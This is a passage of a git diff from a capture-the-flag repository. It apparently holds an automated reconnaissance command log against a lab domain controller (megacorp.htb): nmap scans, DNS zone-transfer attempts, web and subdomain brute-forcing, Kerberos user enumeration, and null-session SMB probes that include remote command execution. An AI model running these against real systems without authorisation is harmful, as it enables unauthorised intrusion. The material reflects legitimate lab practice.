+SF:VersionRequest,20,"\0\0\x83\x81\0\0\0\0\0\0\0e\0\0\0\0\0\0\0\0\r\x05\0\ +SF:0\0\0\0\0\0\0\0\0")%r(DNS-SD,2E,"\0\0\x80\x82\0\x01\0\0\0\0\0\0\t_servi +SF:ces\x07_dns-sd\x04_udp\x05local\0\0\x0c\0\x01"); + +Host script results: +| dns-brute: +|_ DNS Brute-force hostnames: No results. + +Read data files from: /usr/bin/../share/nmap +Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Sat Oct 28 14:17:15 2023 -- 1 IP address (1 host up) scanned in 116.97 seconds + +``` diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_commands.log b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_commands.log new file mode 100644 index 00000000..f171236d --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_commands.log @@ -0,0 +1,288 @@ +nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_quick_tcp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_quick_tcp_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_full_tcp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_full_tcp_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_top_100_udp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_top_100_udp_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_quick_tcp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_quick_tcp_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_full_tcp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_full_tcp_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_top_100_udp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_top_100_udp_nmap.xml" 10.129.243.131 + +dig -p 53 -x 10.129.243.131 @10.129.243.131 + +dig AXFR -p 53 @10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 53 --script="banner,(dns* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dns_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/xml/tcp_53_dns_nmap.xml" 10.129.243.131 + +feroxbuster -u http://10.129.243.131:80/ -t 10 -w /root/.local/share/AutoRecon/wordlists/dirbuster.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -q -e -o "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt" + +curl -sSikf http://10.129.243.131:80/.well-known/security.txt + +curl -sSikf http://10.129.243.131:80/robots.txt + +curl -sSik http://10.129.243.131:80/ + +nmap -vv --reason -Pn -T4 -sV -p 80 --script="banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/xml/tcp_80_http_nmap.xml" 10.129.243.131 + +whatweb --color=never --no-errors -a 3 -v http://10.129.243.131:80 2>&1 + +wkhtmltoimage --format png http://10.129.243.131:80/ /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_screenshot.png + +nmap -vv --reason -Pn -T4 -sV -p 88 --script="banner,krb5-enum-users" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp88/tcp_88_kerberos_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp88/xml/tcp_88_kerberos_nmap.xml" 10.129.243.131 + +impacket-getArch -target 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 135 --script="banner,msrpc-enum,rpc-grind,rpcinfo" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/xml/tcp_135_rpc_nmap.xml" 10.129.243.131 + +impacket-rpcdump -port 135 10.129.243.131 + +enum4linux -a -M -l -d 10.129.243.131 2>&1 + +nbtscan -rvh 10.129.243.131 2>&1 + +nmap -vv --reason -Pn -T4 -sV -p 139 --script="banner,(nbstat or smb* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/tcp_139_smb_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/xml/tcp_139_smb_nmap.xml" 10.129.243.131 + +smbclient -L //10.129.243.131 -N -I 10.129.243.131 2>&1 + +smbmap -H 10.129.243.131 -P 139 2>&1 + +nmap -vv --reason -Pn -T4 -sV -p 389 --script="banner,(ldap* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/tcp_389_ldap_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/xml/tcp_389_ldap_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 445 --script="banner,(nbstat or smb* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/tcp_445_smb_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/xml/tcp_445_smb_nmap.xml" 10.129.243.131 + +smbmap -H 10.129.243.131 -P 445 2>&1 + +nmap -vv --reason -Pn -T4 -sV -p 464 --script="banner,krb5-enum-users" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp464/tcp_464_kerberos_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp464/xml/tcp_464_kerberos_nmap.xml" 10.129.243.131 + +impacket-rpcdump -port 593 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 3268 --script="banner,(ldap* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/tcp_3268_ldap_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/xml/tcp_3268_ldap_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 49667 --script="banner,msrpc-enum,rpc-grind,rpcinfo" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49667/tcp_49667_rpc_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49667/xml/tcp_49667_rpc_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 49673 --script="banner,msrpc-enum,rpc-grind,rpcinfo" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49673/tcp_49673_rpc_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49673/xml/tcp_49673_rpc_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 49695 --script="banner,msrpc-enum,rpc-grind,rpcinfo" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49695/tcp_49695_rpc_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49695/xml/tcp_49695_rpc_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 49843 --script="banner,msrpc-enum,rpc-grind,rpcinfo" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49843/tcp_49843_rpc_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49843/xml/tcp_49843_rpc_nmap.xml" 10.129.243.131 + +smbmap -u null -p "" -H 10.129.243.131 -P 139 2>&1 + +smbmap -u null -p "" -H 10.129.243.131 -P 445 2>&1 + +smbmap -H 10.129.243.131 -P 139 -R 2>&1 + +smbmap -H 10.129.243.131 -P 445 -R 2>&1 + +smbmap -u null -p "" -H 10.129.243.131 -P 445 -R 2>&1 + +smbmap -u null -p "" -H 10.129.243.131 -P 139 -R 2>&1 + +smbmap -H 10.129.243.131 -P 445 -x "ipconfig /all" 2>&1 + +smbmap -H 10.129.243.131 -P 139 -x "ipconfig /all" 2>&1 + +smbmap -u null -p "" -H 10.129.243.131 -P 445 -x "ipconfig /all" 2>&1 + +smbmap -u null -p "" -H 10.129.243.131 -P 139 -x "ipconfig /all" 2>&1 + +nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_quick_tcp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_quick_tcp_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_full_tcp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_full_tcp_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_top_100_udp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_top_100_udp_nmap.xml" 10.129.243.131 + +dig -p 53 -x 10.129.243.131 @10.129.243.131 + +dig AXFR -p 53 @10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 53 --script="banner,(dns* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dns_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/xml/tcp_53_dns_nmap.xml" 10.129.243.131 + +feroxbuster -u http://10.129.243.131:80/ -t 10 -w /root/.local/share/AutoRecon/wordlists/dirbuster.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -q -e -o "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt" + +curl -sSikf http://10.129.243.131:80/.well-known/security.txt + +curl -sSikf http://10.129.243.131:80/robots.txt + +curl -sSik http://10.129.243.131:80/ + +nmap -vv --reason -Pn -T4 -sV -p 80 --script="banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/xml/tcp_80_http_nmap.xml" 10.129.243.131 + +whatweb --color=never --no-errors -a 3 -v http://10.129.243.131:80 2>&1 + +wkhtmltoimage --format png http://10.129.243.131:80/ /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_screenshot.png + +nmap -vv --reason -Pn -T4 -sV -p 88 --script="banner,krb5-enum-users" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp88/tcp_88_kerberos_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp88/xml/tcp_88_kerberos_nmap.xml" 10.129.243.131 + +impacket-getArch -target 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 135 --script="banner,msrpc-enum,rpc-grind,rpcinfo" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/xml/tcp_135_rpc_nmap.xml" 10.129.243.131 + +impacket-rpcdump -port 135 10.129.243.131 + +enum4linux -a -M -l -d 10.129.243.131 2>&1 + +nbtscan -rvh 10.129.243.131 2>&1 + +nmap -vv --reason -Pn -T4 -sV -p 139 --script="banner,(nbstat or smb* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/tcp_139_smb_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/xml/tcp_139_smb_nmap.xml" 10.129.243.131 + +smbclient -L //10.129.243.131 -N -I 10.129.243.131 2>&1 + +smbmap -H 10.129.243.131 -P 139 2>&1 + +nmap -vv --reason -Pn -T4 -sV -p 389 --script="banner,(ldap* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/tcp_389_ldap_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/xml/tcp_389_ldap_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 445 --script="banner,(nbstat or smb* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/tcp_445_smb_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/xml/tcp_445_smb_nmap.xml" 10.129.243.131 + +smbmap -H 10.129.243.131 -P 445 2>&1 + +nmap -vv --reason -Pn -T4 -sV -p 464 --script="banner,krb5-enum-users" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp464/tcp_464_kerberos_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp464/xml/tcp_464_kerberos_nmap.xml" 10.129.243.131 + +impacket-rpcdump -port 593 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 3268 --script="banner,(ldap* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/tcp_3268_ldap_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/xml/tcp_3268_ldap_nmap.xml" 10.129.243.131 + +smbmap -u null -p "" -H 10.129.243.131 -P 139 2>&1 + +smbmap -u null -p "" -H 10.129.243.131 -P 445 2>&1 + +smbmap -H 10.129.243.131 -P 139 -R 2>&1 + +smbmap -H 10.129.243.131 -P 445 -R 2>&1 + +smbmap -u null -p "" -H 10.129.243.131 -P 139 -R 2>&1 + +smbmap -u null -p "" -H 10.129.243.131 -P 445 -R 2>&1 + +smbmap -H 10.129.243.131 -P 139 -x "ipconfig /all" 2>&1 + +smbmap -H 10.129.243.131 -P 445 -x "ipconfig /all" 2>&1 + +smbmap -u null -p "" -H 10.129.243.131 -P 139 -x "ipconfig /all" 2>&1 + +smbmap -u null -p "" -H 10.129.243.131 -P 445 -x "ipconfig /all" 2>&1 + +dig -p 53 -x 10.129.243.131 @10.129.243.131 + +dig AXFR -p 53 @10.129.243.131 + +nmap -vv --reason -Pn -T4 -sU -sV -p 53 --script="banner,(dns* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/xml/udp_53_dns_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sU -sV -p 123 --script="banner,(ntp* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp123/udp_123_ntp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp123/xml/udp_123_ntp_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_quick_tcp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_quick_tcp_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_full_tcp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_full_tcp_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_top_100_udp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_top_100_udp_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_quick_tcp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_quick_tcp_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_full_tcp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_full_tcp_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_top_100_udp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_top_100_udp_nmap.xml" 10.129.243.131 + +dnsrecon -n 10.129.243.131 -d megacorp.htb 2>&1 + +dig -p 53 -x 10.129.243.131 @10.129.243.131 + +dig AXFR -p 53 @10.129.243.131 megacorp.htb + +nmap -vv --reason -Pn -T4 -sV -p 53 --script="banner,(dns* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dns_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/xml/tcp_53_dns_nmap.xml" 10.129.243.131 + +gobuster dns -d megacorp.htb -r 10.129.243.131 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -o "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_megacorp.htb_subdomains_subdomains-top1million-110000.txt" + +feroxbuster -u http://10.129.243.131:80/ -t 10 -w /root/.local/share/AutoRecon/wordlists/dirbuster.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -q -e -o "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt" + +curl -sSikf http://10.129.243.131:80/.well-known/security.txt + +curl -sSikf http://10.129.243.131:80/robots.txt + +curl -sSik http://10.129.243.131:80/ + +nmap -vv --reason -Pn -T4 -sV -p 80 --script="banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/xml/tcp_80_http_nmap.xml" 10.129.243.131 + +curl -sk -o /dev/null -H "Host: buoTkusKMRHQqExxyMge.megacorp.htb" http://megacorp.htb:80/ -w "%{size_download}" + +whatweb --color=never --no-errors -a 3 -v http://10.129.243.131:80 2>&1 + +wkhtmltoimage --format png http://10.129.243.131:80/ /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_screenshot.png + +nmap -vv --reason -Pn -T4 -sV -p 88 --script="banner,krb5-enum-users" --script-args krb5-enum-users.realm="megacorp.htb",userdb="/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp88/tcp_88_kerberos_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp88/xml/tcp_88_kerberos_nmap.xml" 10.129.243.131 + +impacket-getArch -target 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 135 --script="banner,msrpc-enum,rpc-grind,rpcinfo" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/xml/tcp_135_rpc_nmap.xml" 10.129.243.131 + +impacket-rpcdump -port 135 10.129.243.131 + +enum4linux -a -M -l -d 10.129.243.131 2>&1 + +nbtscan -rvh 10.129.243.131 2>&1 + +nmap -vv --reason -Pn -T4 -sV -p 139 --script="banner,(nbstat or smb* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/tcp_139_smb_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/xml/tcp_139_smb_nmap.xml" 10.129.243.131 + +smbclient -L //10.129.243.131 -N -I 10.129.243.131 2>&1 + +smbmap -H 10.129.243.131 -P 139 2>&1 + +nmap -vv --reason -Pn -T4 -sV -p 389 --script="banner,(ldap* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/tcp_389_ldap_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/xml/tcp_389_ldap_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 445 --script="banner,(nbstat or smb* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/tcp_445_smb_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/xml/tcp_445_smb_nmap.xml" 10.129.243.131 + +smbmap -H 10.129.243.131 -P 445 2>&1 + +nmap -vv --reason -Pn -T4 -sV -p 464 --script="banner,krb5-enum-users" --script-args krb5-enum-users.realm="megacorp.htb",userdb="/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp464/tcp_464_kerberos_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp464/xml/tcp_464_kerberos_nmap.xml" 10.129.243.131 + +impacket-rpcdump -port 593 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 3268 --script="banner,(ldap* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/tcp_3268_ldap_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/xml/tcp_3268_ldap_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 49667 --script="banner,msrpc-enum,rpc-grind,rpcinfo" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49667/tcp_49667_rpc_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49667/xml/tcp_49667_rpc_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 49695 --script="banner,msrpc-enum,rpc-grind,rpcinfo" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49695/tcp_49695_rpc_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49695/xml/tcp_49695_rpc_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 49843 --script="banner,msrpc-enum,rpc-grind,rpcinfo" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49843/tcp_49843_rpc_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49843/xml/tcp_49843_rpc_nmap.xml" 10.129.243.131 + +ffuf -u http://megacorp.htb:80/ -t 10 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.megacorp.htb" -fs 1034 -noninteractive -s | tee "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_megacorp.htb_vhosts_subdomains-top1million-110000.txt" + +dig AXFR -p 53 @10.129.243.131 + +smbmap -u null -p "" -H 10.129.243.131 -P 445 2>&1 + +smbmap -H 10.129.243.131 -P 445 -R 2>&1 + +smbmap -u null -p "" -H 10.129.243.131 -P 445 -R 2>&1 + +smbmap -H 10.129.243.131 -P 445 -x "ipconfig /all" 2>&1 + +smbmap -u null -p "" -H 10.129.243.131 -P 445 -x "ipconfig /all" 2>&1 + +smbmap -u null -p "" -H 10.129.243.131 -P 139 2>&1 + +smbmap -H 10.129.243.131 -P 139 -R 2>&1 + +smbmap -u null -p "" -H 10.129.243.131 -P 139 -R 2>&1 + +smbmap -H 10.129.243.131 -P 139 -x "ipconfig /all" 2>&1 + +smbmap -u null -p "" -H 10.129.243.131 -P 139 -x "ipconfig /all" 2>&1 + +dnsrecon -n 10.129.243.131 -d megacorp.htb 2>&1 + +dig -p 53 -x 10.129.243.131 @10.129.243.131 + +dig AXFR -p 53 @10.129.243.131 megacorp.htb + +nmap -vv --reason -Pn -T4 -sU -sV -p 53 --script="banner,(dns* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/xml/udp_53_dns_nmap.xml" 10.129.243.131 + +gobuster dns -d megacorp.htb -r 10.129.243.131 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -o "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_megacorp.htb_subdomains_subdomains-top1million-110000.txt" + +nmap -vv --reason -Pn -T4 -sU -sV -p 88 --script="banner,krb5-enum-users" --script-args krb5-enum-users.realm="megacorp.htb",userdb="/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp88/udp_88_kerberos_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp88/xml/udp_88_kerberos_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sU -sV -p 123 --script="banner,(ntp* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp123/udp_123_ntp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp123/xml/udp_123_ntp_nmap.xml" 10.129.243.131 + +dig AXFR -p 